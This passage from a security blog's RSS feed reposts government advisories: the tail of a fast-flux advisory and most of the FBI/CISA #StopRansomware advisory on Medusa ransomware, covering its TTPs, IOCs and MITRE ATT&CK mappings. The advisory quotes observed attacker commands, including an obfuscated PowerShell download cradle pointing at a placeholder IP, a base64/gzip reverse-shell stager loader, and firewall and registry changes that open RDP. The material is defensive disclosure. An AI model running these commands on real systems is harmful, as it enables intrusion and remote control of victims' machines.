<p>[2] Australian Signals Directorate’s Australian Cyber Security Centre. &#8220;Bulletproof&#8221; hosting providers: Cracks in the armour of cybercriminal infrastructure. 2025.&nbsp;<a href="https://www.cyber.gov.au/about-us/view-all-content/publications/bulletproof-hosting-providers" target="_blank" title="&quot;Bulletproof&quot; hosting providers Cracks in the armour of cybercriminal infrastructure">https://www.cyber.gov.au/about-us/view-all-content/publications/bulletproof-hosting-providers</a>&nbsp;</p>
<p>[3] Logpoint. A Comprehensive guide to Detect Ransomware. 2023.&nbsp;<a href="https://www.logpoint.com/wp-content/uploads/2023/04/logpoint-a-comprehensive-guide-to-detect-ransomware.pdf" target="_blank" title="A Comprehensive Guide to Detect Ransomware">https://www.logpoint.com/wp-content/uploads/2023/04/logpoint-a-comprehensive-guide-to-detect-ransomware.pdf</a></p>
<p>[4] Trendmicro. Modern Ransomware’s Double Extortion Tactic’s and How to Protect Enterprises Against Them. 2021.&nbsp;<a href="https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/modern-ransomwares-double-extortion-tactics-and-how-to-protect-enterprises-against-them" target="_blank" title="Modern Ransomware's Double Extortion Tactics and How to Protect Enterprises Against Them">https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/modern-ransomwares-double-extortion-tactics-and-how-to-protect-enterprises-against-them</a></p>
<p>[5] Unit 42. Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine. 2022.&nbsp;<a href="https://unit42.paloaltonetworks.com/trident-ursa/" target="_blank" title="Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine ">https://unit42.paloaltonetworks.com/trident-ursa/</a></p>
<p>[6] Recorded Future. BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging Infrastructure. 2024.&nbsp;<a href="https://www.recordedfuture.com/research/bluealpha-abuses-cloudflare-tunneling-service" target="_blank" title="BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging Infrastructure">https://www.recordedfuture.com/research/bluealpha-abuses-cloudflare-tunneling-service</a>&nbsp;</p>
<p>[7] Silent Push. &#8216;From Russia with a 71&#8242;: Uncovering Gamaredon&#8217;s fast flux infrastructure. New apex domains and ASN/IP diversity patterns discovered. 2023.&nbsp;<a href="https://www.silentpush.com/blog/from-russia-with-a-71/" target="_blank" title="'From Russia with a 71': Uncovering Gamaredon's fast flux infrastructure. New apex domains and ASN/IP diversity patterns discovered.">https://www.silentpush.com/blog/from-russia-with-a-71/</a></p>
<p>[8] DNS Filter. Security Categories You Should be Blocking (But Probably Aren’t). 2023. <a href="https://www.dnsfilter.com/blog/security-categories-you-should-be-blocking-but-probably-arent" target="_blank" title="Security Categories You Should Be Blocking (But Probably Aren't)">https://www.dnsfilter.com/blog/security-categories-you-should-be-blocking-but-probably-arent</a></p>
<p>[9] National Security Agency. Selecting a Protective DNS Service. 2021.&nbsp;<a href="https://media.defense.gov/2025/Mar/24/2003675043/-1/-1/0/CSI-SELECTING-A-PROTECTIVE-DNS-SERVICE-V1.3.PDF" target="_blank" title="Selecting a Protective DNS Service">https://media.defense.gov/2025/Mar/24/2003675043/-1/-1/0/CSI-SELECTING-A-PROTECTIVE-DNS-SERVICE-V1.3.PDF</a></p>
<h3>Disclaimer of endorsement</h3>
<p>The information and opinions contained in this document are provided &#8220;as is&#8221; and without any warranties or guarantees. Reference herein to any specific commercial product, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.</p>
<h3>Purpose</h3>
<p>This document was developed in furtherance of the authoring cybersecurity agencies’ missions, including their responsibilities to identify and disseminate threats, and develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.</p>
<h3>Contact</h3>
<p><strong>National Security Agency (NSA):</strong></p>
<ul>
<li>Cybersecurity Report Feedback:&nbsp;<a href="mailto:CybersecurityReports@nsa.gov" title="CybersecurityReports@nsa.gov">CybersecurityReports@nsa.gov</a></li>
<li>Defense Industrial Base Inquiries and Cybersecurity Services:&nbsp;<a href="mailto:DIB_Defense@cyber.nsa.gov" title="DIB_Defense@cyber.nsa.gov">DIB_Defense@cyber.nsa.gov</a></li>
<li>Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721,&nbsp;<a href="mailto:MediaRelations@nsa.gov" title="MediaRelations@nsa.gov">MediaRelations@nsa.gov</a></li>
</ul>
<p><strong>Cybersecurity and Infrastructure Security Agency (CISA):</strong></p>
<ul>
<li>All organizations should report incidents and anomalous activity to CISA via the agency’s&nbsp;<a href="https://myservices.cisa.gov/irf" title="Incident Reporting System">Incident Reporting System</a>, its 24/7 Operations Center at&nbsp;<a href="mailto:report@cisa.gov" title="report@cisa.gov">report@cisa.gov</a>, or by calling 1-844-Say-CISA (1-844-729-2472). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment user for the activity; the name of the submitting company or organization; and a designated point of contact.</li>
</ul>
<p><strong>Federal Bureau of Investigation (FBI):</strong></p>
<ul>
<li>To report suspicious or criminal activity related to information found in this advisory,&nbsp;<a href="https://www.fbi.gov/contact-us/field-offices" target="_blank" title="FBI Field Offices">contact your local FBI field office</a>&nbsp;or the FBI’s&nbsp;<a href="https://www.ic3.gov/" target="_blank" title="Internet Crime Complaint Center">Internet Crime Complaint Center</a> (IC3). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.</li>
</ul>
<p><strong>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC):</strong></p>
<ul>
<li>For inquiries, visit ASD’s website at&nbsp;<a href="http://www.cyber.gov.au/" target="_blank" title="Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)">www.cyber.gov.au</a> or call the Australian Cyber Security Hotline at 1300 CYBER1 (1300 292 371).</li>
</ul>
<p><strong>Canadian Centre for Cyber Security (CCCS):</strong></p>
<ul>
<li>CCCS supports Canadian organizations. Visit&nbsp;<a href="https://www.cyber.gc.ca/" target="_blank" title="Canadian Centre for Cyber Security (CCCS)">www.cyber.gc.ca</a> for publications and guidance or contact CCCS via 1-833-CYBER-88 or email&nbsp;<a href="mailto:contact@cyber.gc.ca" title="contact@cyber.gc.ca">contact@cyber.gc.ca</a>.</li>
</ul>
<p><strong>New Zealand National Cyber Security Centre (NCSC-NZ):</strong></p>
<ul>
<li>The NCSC-NZ assists New Zealand organizations. Visit&nbsp;<a href="http://www.ncsc.govt.nz/" target="_blank" title="New Zealand National Cyber Security Centre (NCSC–NZ)">www.ncsc.govt.nz</a> for guidance and resources, or email NCSC-NZ at&nbsp;<a href="mailto:info@ncsc.govt.nz" title="info@ncsc.govt.nz">info@ncsc.govt.nz</a>.&nbsp;</li>
</ul>
<p>Source: US-CERT Alerts</p>
]]></content:encoded>
			<wfw:commentRss>http://disensogroup.com/fast-flux-a-national-security-threat/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>#StopRansomware: Medusa Ransomware</title>
		<link>http://disensogroup.com/stopransomware-medusa-ransomware/</link>
		<comments>http://disensogroup.com/stopransomware-medusa-ransomware/#comments</comments>
		<pubDate>Tue, 11 Mar 2025 14:52:42 +0000</pubDate>
		<dc:creator><![CDATA[pdisenso]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[aside format]]></category>

		<guid isPermaLink="false">http://disensogroup.com/stopransomware-medusa-ransomware/</guid>
		<description><![CDATA[Summary Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see...]]></description>
				<content:encoded><![CDATA[<h2><strong>Summary</strong></h2>
<p><strong>Note:</strong> This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit <a href="https://www.cisa.gov/stopransomware" title="Stopransomware.gov">stopransomware.gov</a> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</p>
<p>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025.&nbsp;</p>
<p>Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa ransomware variant is unrelated to the <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-181a" title="#StopRansomware: MedusaLocker">MedusaLocker</a> variant and the Medusa mobile malware variant per the FBI’s investigation.</p>
<p>FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the <strong>Mitigations</strong> section of this advisory to reduce the likelihood and impact of Medusa ransomware incidents.</p>
<p>Download the PDF version of this report:</p>
<div class="c-file">
<div class="c-file__download">
    <a href="/sites/default/files/2025-03/aa25-071a-stopransomware-medusa-ransomware.pdf" class="c-file__link" target="_blank">AA25-071A #StopRansomware: Medusa Ransomware</a><br />
    <span class="c-file__size">(PDF,       672.45 KB<br />
  )</span>
  </div>
</div>
<p>For a downloadable list of IOCs, see:</p>
<div class="c-file">
<div class="c-file__download">
    <a href="/sites/default/files/2025-03/AA25-071A.stix_.xml" class="c-file__link" target="_blank">AA25-071A STIX XML</a><br />
    <span class="c-file__size">(XML,       34.30 KB<br />
  )</span>
  </div>
</div>
<div class="c-file">
<div class="c-file__download">
    <a href="/sites/default/files/2025-03/AA25-071A-StopRansomware-Medusa-Ransomware.stix_.json" class="c-file__link" target="_blank">AA25-071A STIX JSON</a><br />
    <span class="c-file__size">(JSON,       42.28 KB<br />
  )</span>
  </div>
</div>
<h3><strong>Technical Details</strong></h3>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v16/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 16. See the <strong>MITRE ATT&amp;CK Tactics and Techniques</strong> section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p>
<h3>Background</h3>
<p>The RaaS Medusa variant has been used to conduct ransomware attacks from 2021 to present. Medusa originally operated as a closed ransomware variant, meaning all development and associated operations were controlled by the same group of cyber threat actors. While Medusa has since progressed to using an affiliate model, important operations such as ransom negotiation are still centrally controlled by the developers. Both Medusa developers and affiliates—referred to as “Medusa actors” in this advisory—employ a double extortion model, where they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid.</p>
<h3>Initial Access</h3>
<p>Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access [<a href="https://attack.mitre.org/versions/v16/tactics/TA0001/" title="Initial Access">TA0001</a>] to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa. Medusa IABs (affiliates) are known to make use of common techniques, such as:</p>
<ul>
<li><strong>Phishing campaigns</strong> as a primary method for stealing victim credentials&nbsp;[<a href="https://attack.mitre.org/versions/v16/techniques/T1566/" title="Phishing">T1566</a>].</li>
<li><strong>Exploitation of unpatched software vulnerabilities [</strong><a href="https://attack.mitre.org/versions/v16/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a><strong>]</strong> through Common Vulnerabilities and Exposures (CVEs) such as the ScreenConnect vulnerability&nbsp;<a href="https://www.cve.org/CVERecord?id=CVE-2024-1709" title="Authentication bypass using an alternate path or channel">CVE-2024-1709</a> [<a href="https://cwe.mitre.org/data/definitions/288.html" title="Authentication Bypass Using an Alternate Path or Channel">CWE-288: Authentication Bypass Using an Alternate Path or Channel</a>] and Fortinet EMS SQL injection vulnerability [<a href="https://www.cve.org/CVERecord?id=CVE-2023-48788" title="CVE-2023-48788">CVE-2023-48788</a> [<a href="https://cwe.mitre.org/data/definitions/89.html" title="Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')">CWE 89: SQL Injection</a>].</li>
</ul>
<h3>Discovery</h3>
<p>Medusa actors use&nbsp;<a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living Off the Land Techniques">living off the land (LOTL)</a> and legitimate tools Advanced IP Scanner&nbsp;and SoftPerfect Network Scanner&nbsp;for initial user, system, and network enumeration.&nbsp;Once a foothold in a victim network is established, commonly scanned ports include:</p>
<ul>
<li><code>21</code> (FTP)</li>
<li><code>22</code> (SSH)</li>
<li><code>23</code> (Telnet)</li>
<li><code>80</code> (HTTP)</li>
<li><code>115</code> (SFTP)</li>
<li><code>443</code> (HTTPS)</li>
<li><code>1433</code> (SQL database)</li>
<li><code>3050</code> (Firebird database)</li>
<li><code>3128</code> (HTTP web proxy)</li>
<li><code>3306</code> (MySQL database)</li>
<li><code>3389</code> (RDP)</li>
</ul>
<p>Medusa actors primarily use PowerShell [<a href="https://attack.mitre.org/versions/v16/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a>] and the Windows Command Prompt (cmd.exe) [<a href="https://attack.mitre.org/versions/v16/techniques/T1059/003/" title="Command and Scripting Interpreter: Windows Command Shell">T1059.003</a>] for network [<a href="https://attack.mitre.org/versions/v16/techniques/T1046/" title="Network Service Discovery">T1046</a>] and filesystem enumeration [<a href="https://attack.mitre.org/versions/v16/techniques/T1083/" title="File and Directory Discovery">T1083</a>] and to utilize Ingress Tool Transfer capabilities [<a href="https://attack.mitre.org/versions/v16/techniques/T1105/" title="Ingress Tool Transfer">T1105</a>]. Medusa actors use Windows Management Instrumentation (WMI) [<a href="https://attack.mitre.org/versions/v16/techniques/T1047/" title="Windows Management Instrumentation">T1047</a>] for querying system information.</p>
<h3>Defense Evasion</h3>
<p>Medusa actors use LOTL to avoid detection [<a href="https://attack.mitre.org/versions/v16/tactics/TA0005/" title="Defense Evasion">TA0005</a>]. (See&nbsp;<strong>Appendix A</strong> for associated shell commands observed during FBI investigations of Medusa victims.) Certutil (<code>certutil.exe</code>) is used to avoid detection when performing file ingress.</p>
<p>Actors have been observed using several different PowerShell detection evasion techniques with increasing complexity, which are provided below. Additionally, Medusa actors attempt to cover their tracks by deleting the PowerShell command line history [<a href="https://attack.mitre.org/versions/v16/techniques/T1070/003/" title="Indicator Removal: Clear Command History">T1070.003</a>].</p>
<p>In this example, Medusa actors use a well-known evasion technique that executes a base64 encrypted command [<a href="https://attack.mitre.org/versions/v16/techniques/T1027/013/" title="Obfuscated Files or Information: Encrypted/Encoded File">T1027.013</a>] using specific execution settings.</p>
<ul>
<li><code>powershell -exec bypass -enc &lt;base64 encrypted command string&gt;</code></li>
</ul>
<p>In another example, the&nbsp;DownloadFile string is obfuscated by slicing it into pieces and referencing it via a variable [<a href="https://attack.mitre.org/versions/v16/techniques/T1027/" title="Obfuscated Files or Information">T1027</a>].</p>
<ul>
<li><code>powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://&lt;ip&gt;/&lt;RAS tool&gt;.msi)</code></li>
</ul>
<p>In the final example, the payload is an obfuscated base64 string read into memory, decompressed from&nbsp;<code>gzip</code>, and used to create a&nbsp;<code>scriptblock</code>. The base64 payload is split using empty strings and concatenation, and uses a format operator (<code>-f</code>) followed by three arguments to specify character replacements in the base64 payload.</p>
<ul>
<li><code>powershell -nop -w hidden -noni -ep bypass &amp;([scriptblock]::create((</code></li>
<li><code>New-Object System.IO.StreamReader(</code></li>
<li><code>New-Object System.IO.Compression.GzipStream((</code></li>
<li><code>New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(</code></li>
<li><code>(('&lt;base64 payload string&gt;')-f'&lt;character replacement 0&gt;','&lt;character replacement 1&gt;', '&lt;character replacement 2&gt;')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</code></li>
</ul>
<p>The obfuscated base64 PowerShell payload is identical to <code>powerfun.ps1</code>, a publicly available stager script that can create either a reverse or bind shell over TLS to load additional modules. In the bind shell, the script awaits a connection on local port <code>443</code> [<a href="https://attack.mitre.org/versions/v16/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols">T1071.001</a>], and initiates a connection to a remote port <code>443</code> in the reverse shell.</p>
<p>In some instances, Medusa actors attempted to use vulnerable or signed drivers to kill or delete endpoint detection and response (EDR) tools [<a href="https://attack.mitre.org/versions/v16/techniques/T1562/001/" title="Impair Defenses: Disable or Modify Tools">T1562.001</a>].</p>
<p>FBI has observed Medusa actors using the following tools to support command and control (C2) and evade detection:</p>
<ul>
<li>Ligolo.
<ul>
<li>A reverse tunneling tool often used to create secure connections between a compromised host and threat actor’s machine.</li>
</ul>
</li>
<li>Cloudflared.
<ul>
<li>Formerly known as ArgoTunnel.</li>
<li>Used to securely expose applications, services, or servers to the internet via Cloudflare Tunnel without exposing them directly.</li>
</ul>
</li>
</ul>
<h3>Lateral Movement and Execution</h3>
<p>Medusa actors use a variety of legitimate remote access software [<a href="https://attack.mitre.org/versions/v16/techniques/T1219/" title="Remote Access Software">T1219</a>]; they may tailor their choice based on any remote access tools already present in the victim environment as a means of evading detection. Investigations identified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. Medusa uses these tools—in combination with Remote Desktop Protocol (RDP) [<a href="https://attack.mitre.org/versions/v16/techniques/T1021/001/" title="Remote Services: Remote Desktop Protocol">T1021.001</a>] and PsExec [<a href="https://attack.mitre.org/versions/v16/techniques/T1569/002/" title="System Services: Service Execution">T1569.002</a>]—to move laterally [<a href="https://attack.mitre.org/versions/v16/tactics/TA0008/" title="Lateral Movement">TA0008</a>] through the network and identify files for exfiltration [<a href="https://attack.mitre.org/versions/v16/tactics/TA0010/" title="Exfiltration">TA0010</a>] and encryption [<a href="https://attack.mitre.org/versions/v16/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>]. When provided with valid username and password credentials, Medusa actors use PsExec to:</p>
<ul>
<li>Copy (<code>-c</code>) one script from various batch scripts on the current machine to the remote machine and execute it with <code>SYSTEM</code> level privileges (<code>-s</code>).</li>
<li>Execute an already existing local file on a remote machine with <code>SYSTEM</code> level privileges.</li>
<li>Execute remote shell commands using <code>cmd /c</code>.</li>
</ul>
<p>One of the batch scripts executed by PsExec is <code>openrdp.bat</code>, which first creates a new firewall rule to allow inbound TCP traffic on port <code>3389</code>:</p>
<ul>
<li><code>netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow</code></li>
</ul>
<p>Then, a rule to allow remote WMI connections is created:</p>
<ul>
<li><code>netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes</code></li>
</ul>
<p>Finally, the registry is modified to allow Remote Desktop connections:</p>
<ul>
<li><code>reg add "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</code></li>
</ul>
<p><a href="https://attack.mitre.org/versions/v16/software/S0002/" title="Mimikatz">Mimikatz</a> has also been observed in use for Local Security Authority Subsystem Service (LSASS) dumping [<a href="https://attack.mitre.org/versions/v16/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a>] to harvest credentials [<a href="https://attack.mitre.org/tactics/TA0006/" title="Credential Access">TA0006</a>] and aid lateral movement.</p>
<h3>Exfiltration and Encryption</h3>
<p>Medusa actors install and use <a href="https://attack.mitre.org/versions/v16/software/S1040/" title="Rclone">Rclone</a> to facilitate exfiltration of data to the Medusa C2 servers [<a href="https://attack.mitre.org/versions/v16/techniques/T1567/002/" title="Exfiltration Over Web Service: Exfiltration to Cloud Storage">T1567.002</a>] used by actors and affiliates. The actors use Sysinternals PsExec, PDQ Deploy, or BigFix [<a href="https://attack.mitre.org/versions/v16/techniques/T1072/" title="Software Deployment Tools">T1072</a>] to deploy the encryptor, <code>gaze.exe</code>, on files across the network—with the actors disabling Windows Defender and other antivirus services on specific targets. Encrypted files have a <code>.medusa</code> file extension. The process <code>gaze.exe</code> terminates all services [<a href="https://attack.mitre.org/versions/v16/techniques/T1489/" title="Service Stop">T1489</a>] related to backups, security, databases, communication, file sharing and websites, then deletes shadow copies [<a href="https://attack.mitre.org/versions/v16/techniques/T1490/" title="Inhibit System Recovery">T1490</a>] and encrypts files with AES-256 before dropping the ransom note. The actors then manually turn off [<a href="https://attack.mitre.org/versions/v16/techniques/T1529/" title="System Shutdown/Reboot">T1529</a>] and encrypt virtual machines and delete their previously installed tools [<a href="https://attack.mitre.org/versions/v16/techniques/T1070/" title="Indicator Removal">T1070</a>].</p>
<h3>Extortion</h3>
<p>Medusa RaaS employs a double extortion model, where victims must pay [<a href="https://attack.mitre.org/versions/v16/techniques/T1657/" title="Financial Theft">T1657</a>] to decrypt files and prevent further release. The ransom note demands victims make contact within 48 hours via either a Tor browser based live chat, or via Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond to the ransom note, Medusa actors will reach out to them directly by phone or email. Medusa operates a&nbsp;<code>.onion</code> data leak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on the site, with direct hyperlinks to Medusa affiliated cryptocurrency wallets. At this stage, Medusa concurrently advertises sale of the data to interested parties before the countdown timer ends. Victims can additionally pay $10,000 USD in cryptocurrency to add a day to the countdown timer.</p>
<p>FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the “true decryptor”— potentially indicating a triple extortion scheme.</p>
<h2><strong>Indicators of Compromise</strong></h2>
<p><strong>Table 1</strong> lists the hashes of malicious files obtained during investigations.</p>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 1: Malicious Files</em></caption>
<thead>
<tr>
<th role="columnheader">Files</th>
<th role="columnheader">Hash (MD5)</th>
<th role="columnheader">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>!!!READ_ME_MEDUSA!!!.txt</td>
<td>Redacted</td>
<td>Ransom note file</td>
</tr>
<tr>
<td>openrdp.bat</td>
<td>44370f5c977e415981febf7dbb87a85c</td>
<td>Allows incoming RDP and remote WMI connections</td>
</tr>
<tr>
<td>pu.exe</td>
<td>80d852cd199ac923205b61658a9ec5bc</td>
<td>Reverse shell</td>
</tr>
</tbody>
</table>
<p><strong>Table 2</strong> includes email addresses used by Medusa actors to extort victims; they are exclusively used for ransom negotiation and contacting victims following compromise. These email addresses are not associated with phishing activity conducted by Medusa actors.</p>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 2: Medusa Email Addresses</em></caption>
<thead>
<tr>
<th role="columnheader">Email Addresses</th>
<th role="columnheader">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>key.medusa.serviceteam@protonmail.com</td>
<td>Used for ransom negotiation</td>
</tr>
<tr>
<td>medusa.support@onionmail.org</td>
<td>Used for ransom negotiation</td>
</tr>
<tr>
<td>mds.svt.breach@protonmail.com</td>
<td>Used for ransom negotiation</td>
</tr>
<tr>
<td>mds.svt.mir2@protonmail.com</td>
<td>Used for ransom negotiation</td>
</tr>
<tr>
<td>MedusaSupport@cock.li</td>
<td>Used for ransom negotiation</td>
</tr>
</tbody>
</table>
<h2><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></h2>
<p>See <strong>Table 3</strong> – <strong>Table 11</strong>&nbsp;for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK® Mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="Decider Tool">Decider Tool</a>.</p>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table&nbsp;3: Initial Access</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Exploit Public-Facing Application</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a></td>
<td>Medusa actors exploited unpatched software or n-day vulnerabilities through common vulnerabilities and exposures.</td>
</tr>
<tr>
<td>Initial Access</td>
<td><a href="https://attack.mitre.org/versions/v16/tactics/TA0001/" title="Initial Access">TA0001</a></td>
<td>Medusa actors recruited initial access brokers (IABS) in cybercriminal forums and marketplaces to obtain initial access.</td>
</tr>
<tr>
<td>Phishing</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1566/" title="Phishing">T1566</a></td>
<td>Medusa IABS used phishing campaigns as a primary method for delivering ransomware to victims.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table&nbsp;4: Defense Evasion</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Indicator Removal: Clear Command History</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1070/003/" title="Indicator Removal: Clear Command History">T1070.003</a></td>
<td>Medusa actors attempt to cover their tracks by deleting the PowerShell command line history.</td>
</tr>
<tr>
<td>Obfuscated Files or Information: Encrypted/Encoded File</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1027/013/" title="Obfuscated Files or Information: Encrypted/Encoded File ">T1027.013</a></td>
<td>Medusa actors use a well-known evasion technique that executes a base64 encrypted command.</td>
</tr>
<tr>
<td>Obfuscated Files or Information</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1027/" title="Obfuscated Files or Information">T1027</a></td>
<td>Medusa actors obfuscated a string by slicing it into pieces and referencing it via a variable.</td>
</tr>
<tr>
<td>Indicator Removal</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1070/" title="Indicator Removal">T1070</a></td>
<td>Medusa actors deleted their previous work and tools installed.&nbsp;</td>
</tr>
<tr>
<td>Impair Defenses: Disable or Modify Tools</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1562/001/" title="Impair Defenses: Disable or Modify Tools ">T1562.001</a></td>
<td>Medusa actors killed or deleted endpoint detection and response tools.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table&nbsp;5: Discovery</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Network Service Discovery</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1046/" title="Network Service Discovery">T1046</a></td>
<td>Medusa actors utilized living of the land techniques to perform network enumeration.</td>
</tr>
<tr>
<td>File and Directory Discovery</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1083/" title="File and Directory Discovery">T1083</a></td>
<td>Medusa actors utilized Windows Command Prompt for filesystem enumeration.</td>
</tr>
<tr>
<td>Network Share Discovery</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1135/" title="Network Share Discovery">T1135</a></td>
<td>Medusa actors queried shared drives on the local system to gather sources of information.</td>
</tr>
<tr>
<td>System Network Configuration Discovery</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1016/" title="System Network Configuration Discovery">T1016</a></td>
<td>Medusa actors used operating system administrative utilities to gather network information.</td>
</tr>
<tr>
<td>System Information Discovery</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1082/" title="System Information Discovery">T1082</a></td>
<td>Medusa actors used the command&nbsp;<code>systeminfo</code> to gather detailed system information.</td>
</tr>
<tr>
<td>Permission Groups Discovery: Domain Groups</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1069/002/" title="Permission Groups Discovery: Domain Groups">T1069.002</a></td>
<td>Medusa actors attempt to find domain-level group and permission settings.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table&nbsp;6: Credential Access</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Credential Access</td>
<td><a href="https://attack.mitre.org/tactics/TA0006/" title="Credential Access">TA0006</a></td>
<td>Medusa actors harvest credentials with tools like Mimikatz to gain access to systems.</td>
</tr>
<tr>
<td>OS Credential Dumping: LSASS Memory</td>
<td><a href="https://attack.mitre.org/versions/v16/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a></td>
<td>Medusa actors were observed accessing credential material stored in process memory or Local Security Authority Subsystem Service (LSASS) using Mimkatz.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 7: Lateral Movement and Execution</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Lateral Movement</td>
<td><a href="https://attack.mitre.org/versions/v16/tactics/TA0008/" title="Lateral Movement">TA0008</a></td>
<td>Medusa actors performed techniques to move laterally without detection once they gained initial access.</td>
</tr>
<tr>
<td>Command and Scripting Interpreter: PowerShell</td>
